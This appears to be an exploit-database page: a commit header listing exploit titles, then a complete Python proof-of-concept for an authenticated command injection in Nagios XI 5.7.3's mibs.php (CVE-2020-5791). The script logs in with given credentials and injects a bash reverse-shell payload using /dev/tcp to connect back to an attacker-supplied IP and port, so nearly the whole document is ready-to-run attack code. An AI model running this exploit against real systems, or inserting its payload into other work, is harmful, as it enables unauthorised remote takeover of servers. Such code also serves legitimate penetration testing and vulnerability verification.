e178c80d85
10 changes to exploits/shellcodes PackageKit < 1.1.13 - File Existence Disclosure aptdaemon < 1.1.1 - File Existence Disclosure Blueman < 2.1.4 - Local Privilege Escalation Exploit - EPSON 1.124 - 'seksmdb.exe' Unquoted Service Path Program Access Controller v1.2.0.0 - 'PACService.exe' Unquoted Service Path Prey 1.9.6 - _CronService_ Unquoted Service Path IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated) CSE Bookstore 1.0 - Authentication Bypass Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion
66 lines
No EOL
2.1 KiB
Python
Executable file
66 lines
No EOL
2.1 KiB
Python
Executable file
# Exploit Title: Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)
|
|
# Date: 10-27-2020
|
|
# Vulnerability Discovery: Chris Lyne
|
|
# Vulnerability Details: https://www.tenable.com/security/research/tra-2020-58
|
|
# Exploit Author: Matthew Aberegg
|
|
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
|
|
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
|
|
# Software Link: https://www.nagios.com/downloads/nagios-xi/
|
|
# Version: Nagios XI 5.7.3
|
|
# Tested on: Ubuntu 20.04
|
|
# CVE: CVE-2020-5791
|
|
|
|
#!/usr/bin/python3
|
|
|
|
import re
|
|
import requests
|
|
import sys
|
|
import urllib.parse
|
|
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
|
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
|
# Credit: Chris Lyne for vulnerability discovery and original PoC
|
|
|
|
if len(sys.argv) != 6:
|
|
print("[~] Usage : ./exploit.py https://NagiosXI_Host/, Username, Password, Attacker IP, Attacker Port")
|
|
exit()
|
|
|
|
host = sys.argv[1]
|
|
username = sys.argv[2]
|
|
password = sys.argv[3]
|
|
attacker_ip = sys.argv[4]
|
|
attacker_port = sys.argv[5]
|
|
|
|
login_url = host + "/nagiosxi/login.php"
|
|
payload = ";/bin/bash -c 'bash -i >& /dev/tcp/{0}/{1} 0>&1';".format(attacker_ip, attacker_port)
|
|
encoded_payload = urllib.parse.quote_plus(payload)
|
|
|
|
|
|
def exploit():
|
|
s = requests.Session()
|
|
login_page = s.get(login_url)
|
|
nsp = re.findall('var nsp_str = "(.*?)"', login_page.text)
|
|
|
|
res = s.post(
|
|
login_url,
|
|
data={
|
|
'nsp': nsp,
|
|
'page': 'auth',
|
|
'debug': '',
|
|
'pageopt': 'login',
|
|
'redirect': '/nagiosxi/index.php?',
|
|
'username': username,
|
|
'password': password,
|
|
'loginButton': ''
|
|
},
|
|
verify=False,
|
|
allow_redirects=True
|
|
)
|
|
|
|
injection_url = host + "/nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file={0}".format(encoded_payload)
|
|
res = s.get(injection_url)
|
|
|
|
if res.status_code != 200:
|
|
print("[~] Failed to connect")
|
|
|
|
if __name__ == '__main__':
|
|
exploit() |